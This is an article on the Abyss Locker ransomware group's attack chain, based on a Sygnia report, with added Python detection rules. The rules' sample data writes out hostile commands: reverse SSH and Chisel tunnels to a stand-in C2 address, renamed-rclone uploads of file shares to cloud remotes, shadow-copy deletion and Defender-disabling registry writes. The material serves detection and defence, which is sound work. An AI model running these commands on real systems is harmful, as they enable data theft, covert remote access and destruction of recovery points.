
Abyss Locker, a ransomware group that surfaced in 2023, has stepped up its attacks throughout 2024, hitting businesses worldwide. A new Sygnia report provides an in-depth analysis of the group’s modus operandi, describing a coordinated and evasive operation that breaks in through vulnerable edge appliances, hijacks credentials, and quietly exfiltrates data before encrypting anything.
Abyss Locker’s attack chain begins with unpatched VPN appliances. Sygnia’s investigation found the attackers exploiting vulnerabilities such as CVE-2021-20038 in SonicWall appliances, an unauthenticated stack-based buffer overflow in the SMA 100 series that was patched in December 2021, and using these entry points to tunnel deeper into corporate networks.
“By exploiting the VPN appliance, the threat actor gained access to internal network devices and hosts, deploying additional tunneling tools to maintain persistence and facilitate further access,” the report reveals.

Once inside, the attackers pivot to network-attached storage (NAS) devices and VMware ESXi hosts, which give them both broad reach into the environment and platforms from which to move laterally.
One of Abyss Locker’s hallmark tactics is targeting backup systems, which significantly weakens an organization’s ability to recover without paying. The group frequently targets Veeam backup servers, running PowerShell scripts such as veeam11.ps1, a modified version of the publicly available Veeam-Get-Creds.ps1, which decrypts the credentials Veeam stores in its configuration database for the hosts it backs up.
“In one instance, a PowerShell script named ‘veeam11.ps1’, which shared significant code similarities with ‘Veeam-Get-Creds.ps1’, was executed,” Sygnia reported.
Beyond backup systems, the ransomware operators remotely dump the Windows Security Account Manager (SAM) and other registry hives (the SYSTEM hive holds the boot key needed to decrypt the SAM, and SECURITY holds LSA secrets and cached domain logons), yielding local and domain credentials. These compromised accounts allow deep lateral movement across the network.
Abyss Locker employs aggressive anti-detection techniques, systematically disabling security mechanisms on compromised hosts. Sygnia identified multiple techniques used by the group, including:
- Disabling Windows Defender by modifying the registry.
- Removing Endpoint Detection and Response (EDR) agents via Task Manager or SYSTEM-level execution.
- Leveraging Bring Your Own Vulnerable Driver (BYOVD) tactics, such as deploying the UpdateDrv.sys driver to disable security protections.
- Using anti-virus and EDR killer executables, including SophosAV.exe and auSophos.exe, to neutralize endpoint security.
“The ‘UpdateDrv.sys’ driver from Zemana Anti-Logger was observed being used to install a malicious service (‘UpdateSVC’) that disables security controls,” Sygnia notes.
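The three host-evasion steps above (registry tampering, a vulnerable driver, a driver service) each leave a distinct trace in standard endpoint telemetry. The rules below are an added example, not code from the Sygnia report or from Abyss Locker’s tooling; they run over a handful of constructed Sysmon and System-log records. The Defender registry paths are the real policy values; the driver and service names are the ones the page reports, and matching a driver by file name is deliberately weak (in production, pin the driver’s hashes, for instance from the LOLDrivers list; none are embedded here):

```python
"""Rules for the host-evasion steps above (Defender registry tampering, BYOVD driver load,
driver-service installation) over constructed Sysmon/System event records.
Added example; not code from the Sygnia report or from Abyss Locker's tooling."""
import re

# Windows Defender policy values that switch protection off when set to 1 (real paths).
DEFENDER_KILL_VALUES = {
    r"hklm\software\policies\microsoft\windows defender\disableantispyware",
    r"hklm\software\policies\microsoft\windows defender\real-time protection\disablerealtimemonitoring",
    r"hklm\software\policies\microsoft\windows defender\real-time protection\disablebehaviormonitoring",
}
# Driver name from the page. File-name matching is weak; in production also pin the
# driver's file/authenticode hashes (e.g. from the LOLDrivers project). None are embedded here.
ABUSED_DRIVER_NAMES = {"updatedrv.sys"}
# Locations a kernel driver has no business being loaded from.
USER_WRITABLE = re.compile(r"^c:\\(?:users|programdata|windows\\temp)\\", re.I)


def check_defender_tamper(ev):
    """Sysmon Event ID 13 (RegistryEvent: value set)."""
    if ev.get("EventID") != 13:
        return None
    # Sysmon renders DWORD data as e.g. "DWORD (0x00000001)".
    if (ev["TargetObject"].lower() in DEFENDER_KILL_VALUES
            and re.fullmatch(r"dword \(0x0*1\)", ev["Details"].lower())):
        return f"defender_tamper: {ev['Image']} set {ev['TargetObject']} = 1"
    return None


def check_driver_load(ev):
    """Sysmon Event ID 6 (DriverLoad)."""
    if ev.get("EventID") != 6:
        return None
    path = ev["ImageLoaded"]
    name = path.rsplit("\\", 1)[-1].lower()
    if name in ABUSED_DRIVER_NAMES:
        return f"byovd_driver: known-abused driver {name} loaded from {path}"
    if USER_WRITABLE.match(path):
        return f"byovd_driver: kernel driver loaded from user-writable path {path}"
    return None


def check_service_install(ev):
    """System log Event ID 7045 (a service was installed)."""
    if ev.get("EventID") != 7045:
        return None
    name, image = ev["ServiceName"], ev["ImagePath"]
    if image.startswith("\\??\\"):            # NT path prefix common for driver services
        image = image[4:]
    if name.lower() == "updatesvc":            # service name reported on the page
        return f"byovd_service: service {name} installed with image {image}"
    if ev.get("ServiceType", "").lower().startswith("kernel") and USER_WRITABLE.match(image):
        return f"byovd_service: kernel-mode service {name} loads {image} from a user-writable path"
    return None


CHECKS = (check_defender_tamper, check_driver_load, check_service_install)


def scan(events):
    """Run every rule over every event; at most one alert per event."""
    alerts = []
    for ev in events:
        for check in CHECKS:
            hit = check(ev)
            if hit:
                alerts.append(hit)
                break
    return alerts


SAMPLE_EVENTS = [  # constructed for this example
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware",
     "Details": "DWORD (0x00000001)"},
    {"EventID": 13, "Image": r"C:\Windows\System32\svchost.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "Details": r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"},
    {"EventID": 6, "ImageLoaded": r"C:\ProgramData\UpdateDrv.sys"},
    {"EventID": 6, "ImageLoaded": r"C:\Windows\System32\drivers\tcpip.sys"},
    {"EventID": 7045, "ServiceName": "UpdateSVC",
     "ImagePath": r"\??\C:\ProgramData\UpdateDrv.sys", "ServiceType": "kernel mode driver"},
    {"EventID": 7045, "ServiceName": "PrintWorkflow",
     "ImagePath": r"C:\Windows\System32\svchost.exe -k PrintWorkflow", "ServiceType": "user mode service"},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

The registry rule only fires when the write actually lands; hosts with Defender Tamper Protection turned on block the write itself, so an empty result is not proof that nobody tried.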
To maintain long-term persistence, Abyss Locker deploys a network of SSH tunnels and SOCKS proxies, often using open-source tools such as Chisel alongside the SSH clients already present on the compromised hosts. These tools allow the attackers to:
- Establish remote access to internal systems.
- Mask malicious activities under legitimate network traffic.
- Pivot through ESXi hosts, VPN appliances, and NAS devices to extend their reach.
Sygnia’s investigation found that the group uses a Windows SSH-based backdoor, deployed via a PowerShell script named ‘deploy443.ps1’. The script installs the backdoor as a Windows service named WMI Helper Agent, a name chosen to blend in with legitimate components (the genuine WMI service is winmgmt, ‘Windows Management Instrumentation’).
“The ‘deploy443.ps1’ script created several supporting files, including a configuration XML file defining the C2 server IP address and SSH remote port-forwarding settings,” Sygnia details.
On ESXi servers, where SSH is disabled by default, the attackers enable the SSH daemon (‘sshd’) and run reverse tunnels back to their Command-and-Control (C2) infrastructure, turning the hypervisors into pivot points for further reconnaissance.
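The tunnelling pattern (ssh -R for remote port forwarding, ssh -D for a SOCKS proxy, chisel in reverse mode) and the backdoor service can be picked out of process command lines, service-install events and ESXi shell history. The following is an added example in Python, not code from the Sygnia report or from Abyss Locker; the Windows event records and the ESXi /var/log/shell.log lines are constructed, the address 203.0.113.10 stands in for a C2 server, the file paths are made up, and the service image path is an assumption about how such a service might be registered:

```python
"""Rules for the tunnelling and backdoor service described above, over constructed Windows
events (Sysmon ID 1 process creation, System ID 7045 service install) and constructed ESXi
/var/log/shell.log lines. Added example; not code from the Sygnia report or Abyss Locker."""
import ipaddress
import re
import shlex

# Only these ranges count as internal; any other address or any hostname is external.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
# OpenSSH client options that consume the next token (so it is not the destination).
SSH_OPTS_WITH_ARG = set("BbcDEeFIiJLlmOopQRSWw")
ESXI_SHELL = re.compile(r"shell\[\d+\]: \[[^\]]+\]: (?P<cmd>.+)$")
ESXI_ENABLE_SSH = re.compile(r"vim-cmd hostsvc/(?:enable|start)_ssh|/etc/init\.d/SSH start")


def is_internal(host):
    try:
        return any(ipaddress.ip_address(host) in net for net in INTERNAL_NETS)
    except ValueError:                        # hostname, not an address literal
        return False


def parse_ssh(argv):
    """Pull -R (remote forward), -D (SOCKS), -p and the destination host out of ssh argv."""
    info = {"remote_forwards": [], "dynamic": [], "port": "22", "host": None}
    i = 1
    while i < len(argv):
        tok = argv[i]
        if tok.startswith("-") and len(tok) > 1:
            for j, flag in enumerate(tok[1:], 1):   # walk bundled flags such as -fNR
                if flag not in SSH_OPTS_WITH_ARG:
                    continue
                val = tok[j + 1:]                   # attached value, e.g. -p443
                if not val and i + 1 < len(argv):
                    i += 1
                    val = argv[i]
                if flag in "RD":
                    info["remote_forwards" if flag == "R" else "dynamic"].append(val)
                elif flag == "p":
                    info["port"] = val
                break
        elif info["host"] is None:
            info["host"] = tok.rsplit("@", 1)[-1]   # drop user@
        i += 1
    return info


def tunnel_alert(argv, where):
    """Flag reverse SSH forwards, SSH SOCKS proxies and chisel reverse clients."""
    if not argv:
        return None
    exe = re.split(r"[\\/]", argv[0])[-1].lower()
    # chisel's 'client <server> R:<spec>' syntax survives renaming the binary.
    if "client" in argv and any(t.startswith("R:") for t in argv):
        return f"chisel_reverse[{where}]: {' '.join(argv)}"
    if exe not in ("ssh", "ssh.exe"):
        return None
    info = parse_ssh(argv)
    if not (info["remote_forwards"] or info["dynamic"]):
        return None
    host = info["host"] or "?"
    scope = "internal" if is_internal(host) else "EXTERNAL"
    return (f"ssh_tunnel[{where}]: {scope} {host}:{info['port']} "
            f"R={info['remote_forwards']} D={info['dynamic']}")


def _argv(cmdline):
    """Windows-style split: keep backslashes, drop surrounding quotes."""
    return [t.strip('"') for t in shlex.split(cmdline, posix=False)]


def scan_windows(events):
    alerts = []
    for ev in events:
        if ev.get("EventID") == 1:
            hit = tunnel_alert(_argv(ev["CommandLine"]), "win")
            if hit:
                alerts.append(hit)
        elif ev.get("EventID") == 7045:
            argv = _argv(ev["ImagePath"])
            exe = re.split(r"[\\/]", argv[0])[-1].lower()
            # 'WMI Helper Agent' is the name the page reports (the genuine WMI service is
            # winmgmt); a service whose binary is the ssh client is suspect in any case.
            if ev["ServiceName"].lower() == "wmi helper agent" or exe == "ssh.exe":
                alerts.append(f"backdoor_service[win]: '{ev['ServiceName']}' -> {argv[0]}")
    return alerts


def scan_esxi_log(text):
    alerts = []
    for line in text.splitlines():
        m = ESXI_SHELL.search(line)
        if not m:
            continue
        cmd = m.group("cmd")
        if ESXI_ENABLE_SSH.search(cmd):
            alerts.append(f"esxi_sshd_enabled: {cmd}")
        else:
            hit = tunnel_alert(shlex.split(cmd), "esxi")
            if hit:
                alerts.append(hit)
    return alerts


SAMPLE_WINDOWS = [  # constructed; 203.0.113.10 stands in for a C2 address
    {"EventID": 1, "CommandLine": r'ssh.exe -N -R 443:127.0.0.1:3389 -p 443 '
                                  r'-i "C:\ProgramData\WMI\id_rsa" tun@203.0.113.10'},
    {"EventID": 1, "CommandLine": "ssh.exe -L 8443:intranet.corp.local:443 jump.corp.local"},
    {"EventID": 1, "CommandLine": "chisel.exe client 203.0.113.10:8443 R:socks"},
    {"EventID": 7045, "ServiceName": "WMI Helper Agent",
     "ImagePath": r'"C:\ProgramData\WMI\ssh.exe" -F C:\ProgramData\WMI\config -N tun@203.0.113.10'},
]
SAMPLE_ESXI_LOG = """\
2024-05-02T01:12:03Z shell[2099876]: [root]: vim-cmd hostsvc/enable_ssh
2024-05-02T01:13:40Z shell[2099876]: [root]: ssh -fN -R 2222:127.0.0.1:22 -p 443 tun@203.0.113.10
2024-05-02T01:15:00Z shell[2099876]: [root]: esxcli system version get
"""
```

The ssh rule keys on the binary name, so a renamed ssh client would slip past it; pairing it with a network rule (outbound long-lived TCP sessions on 443 that are not TLS) closes that gap. The benign -L forward to an internal jump host produces no alert by design.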
Before deploying ransomware, Abyss Locker exfiltrates sensitive corporate data to gain leverage for double extortion. The group primarily uses Rclone, an open-source command-line tool for copying data to cloud storage, renaming its binary to evade detection.
“Consistent with their approach to evasion, the threat actors rename the ‘Rclone’ executable to other names such as ‘ltsvc.exe’ to evade detection,” Sygnia states.
With Rclone the theft is targeted: files matching specific extensions are selected by filter and uploaded to Amazon Web Services (AWS) and Backblaze cloud storage.
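Renaming the binary defeats a rule that looks for rclone.exe by name, but two other signals survive: the OriginalFileName that Sysmon copies out of the PE version resource, and the rclone command-line grammar itself (a verb, a local source, a remote:path destination, --include filters). The following is an added example, not code from the Sygnia report or from Abyss Locker; the process-creation records are constructed, and the remote names (b2, aws), share paths and config path are made up:

```python
"""Rules for renamed-rclone exfiltration, over constructed Sysmon process-creation
(Event ID 1) records. Added example; not code from the Sygnia report or Abyss Locker."""
import re
import shlex

# "remote:path" or ":backend,opt=val:path" names an rclone remote; a Windows drive is a
# single letter before the colon, so it does not match.
REMOTE_RE = re.compile(r"^(?::[a-z0-9]+(?:,[^:]*)?:|[a-z0-9_-]{2,}:)", re.I)
RCLONE_VERBS = {"copy", "sync", "move", "copyto", "moveto"}
FILTER_FLAGS = {"--include", "--exclude", "--filter"}
# rclone flags that take a value (a subset; enough to keep the positionals straight here).
FLAGS_WITH_ARG = FILTER_FLAGS | {"--include-from", "--filter-from", "--transfers",
                                 "--checkers", "--config", "--bwlimit", "--max-age",
                                 "--min-size", "--max-size", "--log-file"}


def parse_rclone(argv):
    """Return (verb, source, destination, filters) for rclone-style argv, else None."""
    verb = next((t for t in argv[1:] if t.lower() in RCLONE_VERBS), None)
    if verb is None:
        return None
    positional, filters = [], []
    i = argv.index(verb) + 1
    while i < len(argv):
        tok = argv[i]
        if tok.startswith("--"):
            name, has_eq, val = tok.partition("=")
            name = name.lower()
            if not has_eq and name in FLAGS_WITH_ARG and i + 1 < len(argv):
                i += 1
                val = argv[i]
            if name in FILTER_FLAGS:
                filters.append(f"{name[2:]}:{val}")
        elif not tok.startswith("-"):         # skip short boolean flags such as -P / -v
            positional.append(tok)
        i += 1
    src = positional[0] if positional else None
    dst = positional[1] if len(positional) > 1 else None
    return verb.lower(), src, dst, filters


def check_process(ev):
    """Reasons this process-creation event looks like rclone exfiltration (may be empty)."""
    image = re.split(r"[\\/]", ev["Image"])[-1].lower()
    original = ev.get("OriginalFileName", "").lower()
    argv = [t.strip('"') for t in shlex.split(ev["CommandLine"], posix=False)]
    reasons = []
    if original == "rclone.exe" and image != "rclone.exe":
        reasons.append(f"rclone PE metadata under renamed image {image}")
    parsed = parse_rclone(argv)
    if parsed:
        verb, src, dst, filters = parsed
        if src and dst and REMOTE_RE.match(dst) and not REMOTE_RE.match(src):
            reasons.append(f"{verb} local {src} -> remote {dst}"
                           + (f" filters={filters}" if filters else ""))
    return reasons


SAMPLE_EVENTS = [  # constructed for this example
    {"Image": r"C:\ProgramData\ltsvc.exe", "OriginalFileName": "rclone.exe",
     "CommandLine": r'ltsvc.exe copy "D:\Shares\Finance" b2:corp-archive/finance '
                    r'--include "*.xlsx" --include "*.docx" --transfers 16 '
                    r'--config C:\ProgramData\ltsvc.conf'},
    {"Image": r"C:\Tools\rclone\rclone.exe", "OriginalFileName": "rclone.exe",
     "CommandLine": r"rclone.exe sync C:\Users\bob\Documents E:\Backup\Documents"},
    {"Image": r"C:\Windows\Temp\svc.exe", "OriginalFileName": "-",   # version info stripped
     "CommandLine": r"svc.exe sync E:\Backups aws:corp-dump --include=*.bak -P"},
    {"Image": r"C:\Windows\System32\robocopy.exe", "OriginalFileName": "robocopy.exe",
     "CommandLine": r"robocopy.exe D:\Shares \\fileserver\archive /MIR"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["Image"], check_process(ev))
```

The third sample shows why the grammar rule matters: an operator who strips the version resource leaves OriginalFileName blank, yet the copy to a remote still stands out. A local-to-local rclone sync (second sample) is left alone.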
After securing complete control over the environment, Abyss Locker launches its final destructive phase—encrypting all accessible data.
- On Windows systems, the ransomware appends the .Abyss extension to encrypted files.
- On ESXi hosts, files are locked using the .crypt extension.
- A ransom note, titled ‘WhatHappened.txt’, is placed across compromised systems.
To further hinder recovery, the attackers run commands to delete Windows Volume Shadow Copies, wiping out the local restore points and pushing victims towards negotiating a ransom payment.
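Shadow-copy deletion is one of the few steps in this chain that almost every ransomware family performs, so it is worth matching robustly. The page does not name the command; vssadmin delete shadows is the usual one. The rules below are an added example, not code from the Sygnia report or from Abyss Locker: they cover the vssadmin form plus the wmic, PowerShell (including an -EncodedCommand payload) and diskshadow variants, which are added here as common alternatives rather than as something attributed to this group. All sample command lines are constructed:

```python
"""Rules for shadow-copy deletion ahead of encryption, over constructed process command
lines. Added example; not code from the Sygnia report or Abyss Locker. Only the vssadmin
form is implied by the page; the other variants are common alternatives."""
import base64
import re

RULES = [
    ("vssadmin_delete", re.compile(r"vssadmin(?:\.exe)?\s+delete\s+shadows", re.I)),
    # Shrinking shadow storage below what the copies need forces Windows to discard them.
    ("vssadmin_resize", re.compile(r"vssadmin(?:\.exe)?\s+resize\s+shadowstorage.*?/maxsize=", re.I)),
    ("wmic_delete", re.compile(r"wmic(?:\.exe)?\s+shadowcopy\s+delete", re.I)),
    ("powershell_delete", re.compile(
        r"win32_shadowcopy.*?(?:remove-wmiobject|remove-ciminstance|\.delete\(\))", re.I)),
    ("diskshadow_script", re.compile(r"diskshadow(?:\.exe)?\s+/s\s+\S+", re.I)),
]
# PowerShell accepts any unambiguous prefix of -EncodedCommand; the common spellings are listed.
ENCODED_RE = re.compile(r"(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)


def normalize(cmdline):
    """Collapse whitespace and append any decoded -EncodedCommand payload (UTF-16LE base64)."""
    text = " ".join(cmdline.split())
    m = ENCODED_RE.search(text)
    if m:
        try:
            text += " " + base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            pass                              # not base64 after all; keep the line as-is
    return text


def classify(cmdline):
    """Names of every rule the normalized command line trips."""
    text = normalize(cmdline)
    return [name for name, rx in RULES if rx.search(text)]


def scan(cmdlines):
    """(command line, matched rules) for every line that trips at least one rule."""
    return [(c, classify(c)) for c in cmdlines if classify(c)]


# Constructed samples; the encoded PowerShell is built here so the example stays readable.
_PS = "Get-WmiObject Win32_ShadowCopy | ForEach-Object { $_.Delete() }"
ENCODED = base64.b64encode(_PS.encode("utf-16-le")).decode()
SAMPLE_COMMANDS = [
    r"C:\Windows\System32\vssadmin.exe delete shadows /all /quiet",
    r'cmd.exe /c "wmic shadowcopy delete /nointeractive"',
    f"powershell.exe -nop -w hidden -enc {ENCODED}",
    r"vssadmin.exe list shadows",
    r"vssadmin.exe resize shadowstorage /for=C: /on=C: /maxsize=401MB",
]

if __name__ == "__main__":
    for cmd, hits in scan(SAMPLE_COMMANDS):
        print(hits, cmd[:70])
```

Decoding -EncodedCommand before matching is what makes the PowerShell rule useful; without it the third sample is an opaque base64 blob. The benign `vssadmin list shadows` is not flagged.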